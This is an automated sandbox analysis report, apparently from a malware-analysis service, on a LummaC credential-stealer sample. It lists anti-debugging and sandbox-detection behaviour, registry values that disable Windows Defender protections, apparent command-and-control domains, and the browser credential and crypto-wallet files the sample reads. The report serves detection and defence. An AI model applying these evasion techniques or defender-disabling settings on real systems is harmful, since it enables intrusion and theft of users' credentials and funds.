Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FA8F second address: 54FAA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FAA2 second address: 54FAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Eh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FAB8 second address: 54FB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F661CE75E93h 0x0000000f pop edx 0x00000010 jmp 00007F661CE75E95h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jbe 00007F661CE75E94h 0x00000020 pop eax 0x00000021 mov esi, dword ptr [ebp+122D398Ch] 0x00000027 push 00000003h 0x00000029 jbe 00007F661CE75E9Bh 0x0000002f push 00000000h 0x00000031 add edi, 52C0432Ah 0x00000037 push 00000003h 0x00000039 call 00007F661CE75E89h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F661CE75E8Ch 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FB4B second address: 54FB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FB4F second address: 54FB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FB55 second address: 54FB8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F661D451436h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jno 00007F661D45144Ch 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FB8A second address: 54FB8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FB8F second address: 54FBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jp 00007F661D451451h 0x00000011 push edx 0x00000012 jmp 00007F661D451449h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FBC4 second address: 54FC07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d lea ebx, dword ptr [ebp+124457EDh] 0x00000013 mov dword ptr [ebp+122D1BF7h], edx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b jmp 00007F661CE75E92h 0x00000020 pop eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jp 00007F661CE75E86h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FC07 second address: 54FC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FC89 second address: 54FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FC8F second address: 54FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F661D45143Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov cl, 5Ah 0x0000000f push 00000000h 0x00000011 jnl 00007F661D451436h 0x00000017 mov dx, di 0x0000001a push 006466F4h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F661D451443h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FCC9 second address: 54FCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 87EA8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 87E9C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A25E82 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AB2B57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Special instruction interceptor: First address: 3DDCDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Special instruction interceptor: First address: 576A02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Special instruction interceptor: First address: 3DB4AA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Special instruction interceptor: First address: 59AEA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Special instruction interceptor: First address: 57CEE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Special instruction interceptor: First address: 6096EB instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Memory allocated: 4BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Memory allocated: 4D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Memory allocated: 6D90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Code function: 3_2_0056E4DF rdtsc

3_2_0056E4DF

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 3784	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe TID: 3332	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: file.exe, 02FQBW3AYVFKS8DMY3O.exe.0.dr	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2097456466.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2261876972.0000000001760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.000000000170E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097456466.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 02FQBW3AYVFKS8DMY3O.exe.0.dr	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Code function: 3_2_0056E4DF rdtsc

3_2_0056E4DF

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Code function: 3_2_003E0709 LdrInitializeThunk,

3_2_003E0709

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store

Source: file.exe, 00000000.00000002.2258990583.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmp

Binary or memory string: QProgram Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1	Jump to behavior

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Registry value created: TamperProtection 0

Jump to behavior

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations	Jump to behavior

Source: file.exe, file.exe, 00000000.00000003.2142625341.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142795174.00000000017ED000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: ets/Electrum-LTC
Source: file.exe	String found in binary or memory: ElectronCash
Source: file.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe	String found in binary or memory: Wallets/Exodus
Source: file.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
